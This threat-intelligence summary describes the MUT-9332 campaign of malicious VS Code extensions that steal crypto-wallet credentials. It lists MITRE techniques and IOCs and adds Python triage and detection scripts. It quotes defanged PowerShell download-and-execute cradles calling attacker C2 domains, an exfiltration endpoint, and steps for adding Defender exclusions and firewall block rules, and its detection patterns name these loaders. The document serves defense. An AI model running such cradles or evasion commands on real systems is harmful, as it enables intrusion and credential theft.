The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions

Datadog Security Research uncovered a campaign by the threat actor MUT-9332 distributing three malicious VS Code extensions—solaibot, among-eth, and blankebesxstnion—that target Solidity developers on Windows. These extensions deploy complex multi-stage malware, including a payload hidden inside an image file, to steal cryptocurrency wallet credentials and maintain persistence on victim systems.

Key points

  • Three malicious VS Code extensions—solaibot, among-eth, and blankebesxstnion—were discovered targeting Solidity developers on Windows and removed from the Marketplace after fewer than 50 total downloads.
  • The extensions use obfuscated JavaScript to deliver multi-stage payloads including PowerShell scripts, a malicious Chromium browser extension (extension.zip), and executables (myau.exe and myaunet.exe) that steal cryptocurrency wallet credentials.
  • The attack chain involves downloading and executing payloads from C2 domains like solidity[.]bot and myaunet[.]su, the latter previously linked to Monero cryptominer campaigns attributed to MUT-9332.
  • myau.exe disables Windows Defender protection through registry edits and folder exclusions and also disables Windows recovery features, while myaunet.exe acts as an infostealer targeting the LevelDB files of wallets, browsers, and communication apps.
  • The malware employs defense evasion tactics such as marking its own process as critical (terminating a critical process crashes Windows), modifying the hosts file, and blocking outbound connections to Microsoft update servers via firewall rules.
  • A notable infection technique retrieves a Base64-encoded payload hidden inside an image file hosted on the Internet Archive; a VBS script that is stored corrupted on disk and repaired at runtime decodes and executes it.
  • The campaign remains active with updated payloads and C2 infrastructure, indicating likely ongoing attacks and evolving tactics from MUT-9332.
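The image-carrier trick in the key points above is easy to check for offline. The following is an added example for this summary, not code from Datadog's write-up or from the malware: it builds a constructed sample (a minimal JPEG with a Base64-encoded PowerShell one-liner appended after the EOI marker), carves any Base64 run out of the file, decodes it, and flags decoded blobs that contain download-cradle markers taken from the command lines quoted on this page. The carrier layout (text placed after EOI) and the loader-token list are assumptions; real samples may place the text elsewhere, so the whole file is scanned as a fallback.

```python
"""Carve a Base64 payload hidden in a JPEG carrier (added example, constructed sample)."""
import base64
import binascii
import re
from typing import List

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

# A run of at least 64 Base64 characters, with optional standard padding.
B64_RUN = re.compile(rb"(?:[A-Za-z0-9+/]{4}){16,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?")

# Markers that make a decoded blob look like a PowerShell download cradle
# (assumption: drawn from the command lines quoted in this summary).
LOADER_TOKENS = (b"iex", b"invoke-expression", b"irm ", b"invoke-restmethod",
                 b"-nop", b"-w hidden", b"executionpolicy bypass")


def build_sample_image(payload: bytes) -> bytes:
    """Constructed carrier: SOI, a JFIF APP0 segment, filler, EOI, then Base64 text."""
    app0 = b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return JPEG_SOI + app0 + b"\x00" * 32 + JPEG_EOI + b"\n" + base64.b64encode(payload) + b"\n"


def trailing_data(image: bytes) -> bytes:
    """Bytes after the last EOI marker (empty if not a JPEG or nothing follows EOI)."""
    if not image.startswith(JPEG_SOI):
        return b""
    eoi = image.rfind(JPEG_EOI)
    if eoi == -1:
        return b""
    return image[eoi + len(JPEG_EOI):]


def carve_base64(image: bytes) -> List[bytes]:
    """Decode every plausible Base64 run: the EOI trailer first, then the whole file."""
    found: List[bytes] = []
    seen = set()
    for region in (trailing_data(image), image):
        for m in B64_RUN.finditer(region):
            token = m.group(0)
            if token in seen:
                continue
            seen.add(token)
            try:
                found.append(base64.b64decode(token, validate=True))
            except binascii.Error:
                continue  # looked like Base64 but was not valid; skip
    return found


def looks_like_loader(blob: bytes) -> bool:
    """Heuristic: does the decoded blob contain PowerShell download-and-execute markers?"""
    lowered = blob.lower()
    return any(tok in lowered for tok in LOADER_TOKENS)


def find_hidden_loaders(image: bytes) -> List[bytes]:
    """End-to-end check a triage script would run on a suspicious image download."""
    return [blob for blob in carve_base64(image) if looks_like_loader(blob)]


if __name__ == "__main__":
    # Constructed payload modelled on the cradle quoted in this summary (URL kept defanged).
    sample = b'powershell -nop -w hidden -c "irm https://solidity[.]bot/a.txt | iex"'
    for blob in find_hidden_loaders(build_sample_image(sample)):
        print("hidden loader:", blob.decode())
```

The two-pass scan matters in practice: a trailer after EOI is the cheapest place to hide text, but a whole-file pass still catches Base64 stuffed into an APP segment or comment, at the cost of more false positives, which is why decoded blobs are filtered by content rather than reported on sight.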

MITRE Techniques

  • [T1059.001] PowerShell – Used in multiple stages to download and execute payloads (“powershell -ExecutionPolicy Bypass -Command …”, “powershell -nop -w hidden -c …”)
  • [T1547.001] Registry Run Keys / Startup Folder – Persistence achieved by adding a registry key under HKEY_CURRENT_USER\Software\Microsoft (“The script starts by adding a registry key (App = “crypto”) under HKEY_CURRENT_USER\Software\Microsoft.”)
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Windows Defender weakened through folder exclusions and registry edits (“adds a random folder, %localappdata%, to Defender exclusions and registry settings”)
  • [T1140] Deobfuscate/Decode Files or Information – Use of obfuscated JavaScript and corrupted VBS scripts that repair themselves at runtime (“extra characters are removed at runtime to reveal the script”)
  • [T1105] Ingress Tool Transfer – Downloading additional payload components from multiple C2 URLs including solidity[.]bot, myaunet[.]su, and paste[.]ee (“PowerShell commands invoke irm https://solidity[.]bot/a.txt | iex”)
  • [T1562.001] Impair Defenses: Disable or Modify Tools / [T1490] Inhibit System Recovery – Windows Defender’s automatic sample submission is turned off and the Windows Recovery Environment is disabled (“disables Windows Defender’s automatic submission”, “disabling the Windows Recovery Environment”)
  • [T1562.004] Impair Defenses: Disable or Modify System Firewall – Firewall rules block outbound connections to Microsoft update servers
  • [T1059.005] Visual Basic / [T1059.003] Windows Command Shell – cscript.exe runs the VBScript payload and cmd.exe runs shell commands (“Start-Process -FilePath “cscript.exe” …”)
  • [T1083] File and Directory Discovery – Enumeration of LevelDB files from various applications for credential theft (“enumerates LevelDB files within application data directories”)
  • [T1041] Exfiltration Over C2 Channel – Stolen wallet credentials and tokens are sent to the actor’s server via HTTP POST (“Data is exfiltrated via HTTP POST to https://m-vn[.]ws/bird.php”)
  • [T1027.003] Obfuscated Files or Information: Steganography – The payload is concealed as Base64 text inside an image file and only decoded at runtime (“Base64-encoded text embedded in new_image.jpg”)
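The quoted command strings in the technique list are concrete enough to turn into a first-pass hunt over process-creation telemetry. The following is an added example, not Datadog's detection logic: it scores command lines against patterns built from the strings this summary quotes (irm … | iex, -nop -w hidden, -ExecutionPolicy Bypass, cscript.exe launching a .vbs, the C2 domains in defanged or plain form) and flags lines whose combined weight crosses a threshold. The sample command lines are constructed. Two patterns are assumptions, since the summary says what was changed but not how: that the Defender exclusion was added with Add-MpPreference, and that the outbound block rule was added with netsh.

```python
"""Score process command lines against the loader patterns quoted above (added example)."""
import re
from typing import List, Tuple

# (rule name, compiled pattern, weight). Weights are illustrative; tune to your telemetry.
RULES = [
    ("ps_download_cradle",
     re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b[^|]*\|\s*(?:iex|invoke-expression)\b", re.I), 4),
    ("ps_hidden_noprofile",
     re.compile(r"-(?:nop|noprofile)\b.*-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("ps_bypass_policy",
     re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), 2),
    ("vbs_via_cscript",
     re.compile(r"\b[cw]script(?:\.exe)?\b.*\.vbs\b", re.I), 2),
    ("defender_exclusion",   # assumption: exclusion added with the Defender cmdlet
     re.compile(r"add-mppreference\b.*-exclusionpath", re.I), 3),
    ("block_outbound_fw",    # assumption: outbound block rule added with netsh
     re.compile(r"netsh\b.*advfirewall\b.*add\s+rule\b.*dir=out\b.*action=block", re.I), 3),
    ("known_c2_domain",      # matches both plain and defanged forms
     re.compile(r"solidity\[?\.\]?bot|myaunet\[?\.\]?su|m-vn\[?\.\]?ws", re.I), 4),
]
THRESHOLD = 4


def score_command_line(cmdline: str) -> Tuple[int, List[str]]:
    """Return (total weight, names of matching rules) for one process command line."""
    hits = [(name, weight) for name, rx, weight in RULES if rx.search(cmdline)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def triage(cmdlines: List[str]) -> List[Tuple[str, int, List[str]]]:
    """Keep only command lines whose score reaches THRESHOLD, highest score first."""
    flagged = []
    for c in cmdlines:
        score, hits = score_command_line(c)
        if score >= THRESHOLD:
            flagged.append((c, score, hits))
    return sorted(flagged, key=lambda t: t[1], reverse=True)


# Constructed telemetry: four lines shaped like the stages described above, two benign ones.
SAMPLE_CMDLINES = [
    'powershell -nop -w hidden -c "irm https://solidity[.]bot/a.txt | iex"',
    'powershell -ExecutionPolicy Bypass -Command "Start-Process -FilePath cscript.exe -ArgumentList a.vbs"',
    'powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:LOCALAPPDATA"',
    'netsh advfirewall firewall add rule name="NoUpdate" dir=out action=block remoteip=192.0.2.1',
    'powershell -NoProfile -Command "Get-ChildItem C:\\src"',
    'cmd.exe /c dir',
]

if __name__ == "__main__":
    for cmd, score, hits in triage(SAMPLE_CMDLINES):
        print(f"[{score}] {hits}: {cmd}")
```

Note that the netsh line alone scores below the threshold: a single outbound block rule is something administrators create too, so it only contributes when it co-occurs with another stage. Raise its weight if your environment never legitimately adds such rules from a shell.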

Indicators of Compromise

  • [File Hash] Malicious VS Code extension VSIX archives – among-eth.vsix: ce72b79e324371134db762fe70b8b1789af899d7217461bc3658a6bd84743eb6, blankebesxstnion.vsix: e19d5d8f941b9a98fbb3b65e1e6077fa00d97529e351e455297b0204ec07e9ed
  • [File Hash] Payload executables – myau.exe: c5c0228a1e0ba2bb748219325f66acf17078a26165b45728d8e98150377aa068, myaunet.exe: a1eadd41327bd8736e275627d3953944fe7089c032d72a3e429ff18ad0958ada
  • [Domains] Command and Control / exfiltration servers – solidity[.]bot (main C2 and early-stage payloads), myaunet[.]su (payload delivery and Monero cryptominer infrastructure), m-vn[.]ws (HTTP POST exfiltration endpoint)
  • [URLs] Payload download endpoints – http://paste[.]ee/d/0ykW3Z2K/0 (VBS script delivery), https://archive[.]org/download/newimage202505091852/newimage.jpg (Base64 payload image)
  • [File Names] Malicious payload indicators – extension.zip (Chromium browser extension), Launch.exe (renamed myau.exe), a.vbs (VBScript payload)

Read more: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/